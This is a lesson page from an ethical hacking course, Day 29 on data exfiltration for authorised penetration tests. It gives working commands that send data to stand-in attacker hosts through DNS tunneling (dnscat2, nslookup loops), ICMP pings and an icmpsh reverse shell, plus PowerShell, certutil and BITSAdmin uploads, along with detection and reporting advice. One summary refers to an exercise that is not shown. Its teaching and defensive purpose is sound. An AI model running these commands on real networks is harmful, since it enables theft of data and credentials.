⚠️ Lab Environment Only: Data exfiltration techniques must only be demonstrated in authorised penetration testing engagements or isolated lab environments. DNS tunneling and ICMP exfiltration techniques directed at production networks without authorisation are illegal and may trigger criminal investigations under computer fraud laws.
Data exfiltration techniques 2026 — you have lateral movement covered from Day 28, credentials dumped, Domain Admin achieved. The engagement objective is not just “get Domain Admin.” It is “demonstrate that a real attacker could steal your sensitive data.” That requires exfiltration — actually moving collected data out of the network through channels that bypass egress filtering, DLP solutions, and firewall outbound rules. Today covers the three protocols that real red teams use because they are almost universally permitted outbound: DNS on port 53, ICMP echo, and HTTPS on 443. The firewall lets all three through. Your data leaves through all three.
🎯 What You’ll Master in Day 29
Understand why DNS, ICMP, and HTTPS are the preferred exfiltration channels
Set up dnscat2 for DNS tunneling exfiltration with a listener and client
Exfiltrate files through ICMP covert channels using icmpsh
Use PowerShell and certutil for living-off-the-land Windows exfiltration
Understand the detection artefacts each technique leaves for blue team awareness
⏱️ 50 min read · 3 exercises
📋 What You’ll Master — Data Exfiltration Techniques 2026
Why Exfiltration Matters — The Last Mile of the Attack Chain
Many penetration test reports stop at “Domain Admin compromised.” The executive team reads this as a technical problem and struggles to translate it into business risk. Adding an exfiltration demonstration transforms the finding: “We achieved Domain Admin and then successfully exfiltrated the HR database, 5,000 user password hashes, and the CFO’s email archive to an external server via DNS traffic that bypassed your DLP solution and firewall egress rules.” That is a finding that gets immediate remediation budget.
🧠 EXERCISE 1 — THINK LIKE A HACKER (10 MIN · NO TOOLS)
Design the Exfiltration Strategy for Three Different Egress Control Scenarios
⏱️ Time: 10 minutes · No tools required
You have compromised a workstation inside a corporate network.
You need to exfiltrate a 50MB database backup file.
For each egress control scenario, choose the best exfiltration
technique and explain why:
SCENARIO A: All outbound traffic is blocked except ports 80 and 443.
DNS is resolved by an internal server with no internet access.
ICMP is blocked outbound. No web proxy visible.
→ Which technique? What tool? What does the traffic look like?
SCENARIO B: DNS is allowed outbound to 8.8.8.8.
Port 443 is allowed. Port 80 redirects to a web proxy.
ICMP is not blocked.
→ Which technique? Does proxy inspection affect your choice?
SCENARIO C: Full EDR deployed (CrowdStrike).
All standard ports allowed outbound.
DNS allowed. DLP solution scanning SMTP and FTP.
HTTPS to unknown IPs triggers an alert.
→ Which technique avoids both EDR signatures and DLP scanning?
For each scenario: tool name, command structure, and what you
would collect as proof of successful exfiltration in your report.
✅ Scenario A: HTTPS only — use PowerShell Invoke-RestMethod or certutil to POST data to a legitimate-looking HTTPS endpoint (can use a cloud provider like AWS API Gateway as proxy). Scenario B: DNS tunneling first (most reliable when DNS goes out directly) — dnscat2 through port 53, traffic looks like normal DNS resolution queries. Scenario C: HTTPS to a known-good provider (GitHub, AWS S3, legitimate cloud) — EDR and DLP less likely to alert on traffic destined for recognised cloud infrastructure. Use Invoke-WebRequest to post Base64-encoded chunks to S3.
📸 Write your three exfiltration strategies and share in #day-29-exfiltration on Discord.
DNS Tunneling — Encoding Data in DNS Queries With dnscat2
DNS tunneling encodes data into DNS query subdomains. The client encodes a chunk of data as a Base32 or hex string, appends it as a subdomain of an attacker-controlled domain, and sends the DNS query: ZmlsZWNvbnRlbnQ=.attacker.com. The authoritative DNS server for attacker.com is the dnscat2 server, which decodes each query and reassembles the exfiltrated data. From the network’s perspective, this is normal DNS traffic to a domain on the internet — indistinguishable from standard name resolution without deep inspection.
DNSCAT2 — SETUP AND FILE EXFILTRATION
# ATTACKER VPS: Install and start dnscat2 server
git clone https://github.com/iagox86/dnscat2.git && cd dnscat2/server
# On attacker: new session appears — interact with it
session -i 1
shell # Drop into command shell
# Exfiltrate a file through the DNS tunnel
download C:\Windows\NTDS\ntds.dit /tmp/ntds.dit
# Alternative — manual DNS exfil with nslookup (no extra tools)
for b in $(xxd -p -c 16 passwords.txt); do nslookup $b.exfil.attacker.com; done
ICMP Exfiltration — Covert Channel Through Ping Packets
ICMP echo requests (ping) are permitted outbound by almost every firewall that allows any internet connectivity. The protocol has an optional data payload field — standard pings send 32-64 bytes of test data, but there is no technical limit. By encoding file data into ICMP echo request payloads, icmpsh creates a reverse shell that looks like ping traffic to any DPI that does not inspect ICMP payloads.
ICMPSH — ICMP REVERSE SHELL EXFILTRATION
# ATTACKER: Install icmpsh
git clone https://github.com/inquisb/icmpsh.git && cd icmpsh
# Disable OS ICMP responses (required)
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
# Start listener
sudo python3 icmpsh_m.py ATTACKER_IP TARGET_IP
# VICTIM (Windows): run icmpsh client
icmpsh.exe -t ATTACKER_IP -d 500 -b 30 -s 128
# Once shell received — exfiltrate files
type C:\Users\Administrator\Desktop\passwords.txt
# Manual ICMP exfil — base64 encode file and send in pings
data=$(base64 -w 0 secret_file.txt)
for chunk in $(echo $data | fold -w 40); do ping -c 1 -p $(echo $chunk | xxd -p) ATTACKER_IP; done
🌐 EXERCISE 2 — TRYHACKME (25 MIN)
Practice Data Exfiltration Techniques on a TryHackMe Room
⏱️ Time: 25 minutes · Free TryHackMe account
Step 1: Go to tryhackme.com and search for “Data Exfiltration”
Open the “Data Exfiltration” room (free)
Step 2: Deploy the machine and connect via VPN
Step 3: The room walks through multiple exfiltration techniques:
– HTTP exfiltration
– HTTPS exfiltration
– DNS tunneling with iodine or dnscat2
Complete the HTTP exfiltration task first
Step 4: Follow the room’s instructions to:
a) Identify which protocols are permitted outbound
b) Set up the appropriate listener
c) Exfiltrate the target file
d) Confirm receipt on the attacker side
Step 5: For each technique you successfully demonstrate:
Record:
– Tool used
– Command on victim side
– Command on attacker side
– What the traffic looks like in Wireshark
– What detection rule would catch it
Step 6: Complete at least two different exfiltration techniques
Compare the setup complexity vs stealth level of each
✅ What you just learned: The TryHackMe room provides a safe controlled environment to practice the full exfiltration workflow — victim setup, attacker listener, file transfer, and verification. The most valuable output from Step 5 is the Wireshark observation: DNS exfiltration shows a high volume of queries to one unusual domain; HTTPS exfiltration looks identical to normal web browsing. This detection analysis directly informs the “Detection and Response” section of your penetration test report — telling the client not just what you did, but what monitoring they need to catch it.
📸 Screenshot successful file exfiltration confirmation and share in #day-29-exfiltration on Discord.
HTTPS and Living-Off-The-Land Windows Exfiltration
Living-off-the-land exfiltration uses legitimate Windows tools already present on the target machine. No additional binaries to drop, no AV triggers from unknown executable hashes, no unusual process spawning. PowerShell, certutil, and BITSAdmin are all signed Microsoft tools that appear in normal Windows operation — their use for exfiltration is extremely difficult to distinguish from legitimate administrator activity without behavioural context.
✅ What you just learned: The DNS exfil simulation demonstrates the complete encode-transmit-decode cycle without needing an external VPS. Step 5 is the key insight — every byte of the creds.txt file was reconstructed from the DNS query subdomain strings captured in the PCAP. In a real engagement, the tcpdump capture represents what your dnscat2 server receives from the compromised host. The hex encoding in the subdomains (Step 3) is what makes DNS exfiltration invisible to firewalls that only filter by port and protocol without inspecting DNS query content for encoded non-ASCII data.
📸 Screenshot the decoded file content reconstructed from DNS queries and share in #day-29-exfiltration on Discord. Tag #dataexfil2026
Detection Artefacts — What Blue Teams See Per Technique
Every exfiltration technique leaves detection artefacts. Understanding these shapes how you write the detection and remediation section of your penetration test report, and demonstrates a level of professionalism that distinguishes senior testers from junior ones. DNS tunneling generates an anomalously high volume of queries to a single domain with encoded-looking subdomains — SIEM rules alert when a host queries one external domain hundreds of times per minute. ICMP exfiltration shows ICMP packets with large, non-standard payload sizes and suspiciously regular timing. HTTPS exfiltration blends most effectively but leaves access logs on the receiving server and may trigger DLP alerts if the payload contains recognisable sensitive data patterns.
Reporting Exfiltration in Penetration Test Deliverables
The exfiltration finding in a penetration test report should contain: the technique used, the specific data exfiltrated (or a safe representative sample), the egress control bypassed, the detection gap identified, and concrete remediation recommendations. Generic recommendations like “implement DLP” are not sufficient — specify the detection rule (DNS query rate threshold per domain), the log source (DNS query logs), and the SIEM correlation logic that would have caught this specific technique during the assessment.
🧠 QUICK CHECK — Day 29
You are on a compromised Windows host. Outbound TCP is blocked except port 443. ICMP is blocked. But DNS queries resolve correctly. What is your best data exfiltration option and why?
📋 Key Commands — Day 29 Exfiltration Reference Card
dnscat2 server (VPS) + client (target)DNS tunnel — all traffic encoded in DNS queries on UDP 53
icmpsh_m.py ATTACKER TARGET (disable ICMP replies first)ICMP reverse shell — data in ping packet payloads
Invoke-RestMethod -Uri https://attacker/upload -Body $encodedPowerShell HTTPS exfil — living-off-the-land, no extra binaries
certutil -encode file.bin file.b64Windows certutil base64 encode before exfiltration
bitsadmin /transfer job /upload https://host/up file.txtBITSAdmin upload — legitimate Windows background transfer service
xxd -p file | fold -w 63 | xargs -I{} nslookup {}.domainManual DNS exfil — encode file as hex, send in DNS subdomains
🏆 Mark Day 29 as Complete
The attack chain is now complete through Day 29: recon → enumeration → exploitation → lateral movement → credential dumping → data collection → exfiltration. You can now demonstrate end-to-end compromise impact in penetration test deliverables — not just “we got Domain Admin” but “we got Domain Admin and then exfiltrated this data through these channels that bypassed your controls.”
❓ Frequently Asked Questions
What is data exfiltration in penetration testing?
Simulated movement of collected data out of a compromised network to demonstrate that an attacker could successfully exfiltrate sensitive information despite egress controls. It completes the engagement kill chain and translates technical domain compromise into business-language risk about actual data theft.
Why is DNS commonly used for data exfiltration?
DNS UDP port 53 is almost universally permitted outbound — blocking it breaks all internet connectivity. Most DLP solutions do not inspect DNS query subdomains for encoded data. DNS exfil blends perfectly with normal name resolution traffic and bypasses firewalls that only filter by port and protocol.
What is dnscat2 and how does it work?
Dnscat2 is a DNS-based C2 and exfiltration tool. The server runs on an attacker VPS; the client runs on the compromised host. All communication is encoded into DNS query subdomains for an attacker-controlled domain. Creates a bidirectional channel tunneled entirely through DNS — bypassing firewalls that permit outbound DNS.
What are the most detectable data exfiltration techniques?
Most detectable: raw FTP/TCP (uncommon protocols), high-volume DNS (rate anomaly detection). Least detectable: HTTPS to recognised cloud infrastructure, slow-rate DNS exfil staying below anomaly thresholds, and living-off-the-land Windows tools (certutil, BITSAdmin) that appear in normal administrative activity.
What comes after data exfiltration in the course?
Day 30 covers Post-Exploitation Persistence — registry run keys, startup folders, scheduled tasks, WMI subscriptions, and service installation. After demonstrating data collection and exfiltration, Day 30 shows how attackers maintain access without re-exploiting the initial vulnerability.
← Previous
Day 28: Lateral Movement Techniques 2026
Next →
Day 30: Post-Exploitation Persistence 2026
📚 Further Reading
Lateral Movement Techniques 2026— Day 28 covers PSExec, WMI, WinRM, and DCOM lateral movement — the phase that positions you on the most valuable hosts from which to collect and exfiltrate data.
BloodHound Tutorial 2026— Day 27 maps attack paths to the systems containing the highest-value data targets — NTDS.dit on Domain Controllers, SQL databases, file shares — that are the primary exfiltration objectives.
100-Day Ethical Hacking Course— The complete course hub — Day 29 data exfiltration is part of Phase 3 (Days 26–35) covering the complete post-compromise lifecycle from lateral movement through persistence.
dnscat2 GitHub Repository— The official dnscat2 source code, server and client installation guides, and documentation covering all tunnel modes, encryption, and multi-session management.
MITRE ATT&CK — Exfiltration— The definitive MITRE ATT&CK Exfiltration tactic page listing all known techniques including T1048 (Exfiltration Over Alternative Protocol) covering DNS and ICMP with real-world procedure examples.
ME
Mr Elite
Owner, SecurityElites.com
The engagement where exfiltration changed everything was a financial institution that had invested heavily in perimeter security. State-of-the-art next-gen firewall, IDS/IPS on the external boundary, DLP scanning all SMTP and FTP traffic. Their security team genuinely believed data could not leave the network without being detected. We got Domain Admin on day three through a misconfigured Active Directory DACL. We then exfiltrated 2GB of data including the complete Active Directory database through DNS tunneling over three hours. The DNS queries to our dnscat2 server appeared in their logs as failed lookups for an unknown domain. Their SIEM had no rule for DNS query rate anomalies. Their DLP did not inspect DNS. The board presentation six weeks later used that 2GB number as the centrepiece of the risk discussion. Not “Domain Admin achieved.” That 2GB. Exfiltration makes the risk real to people who write remediation budget cheques.
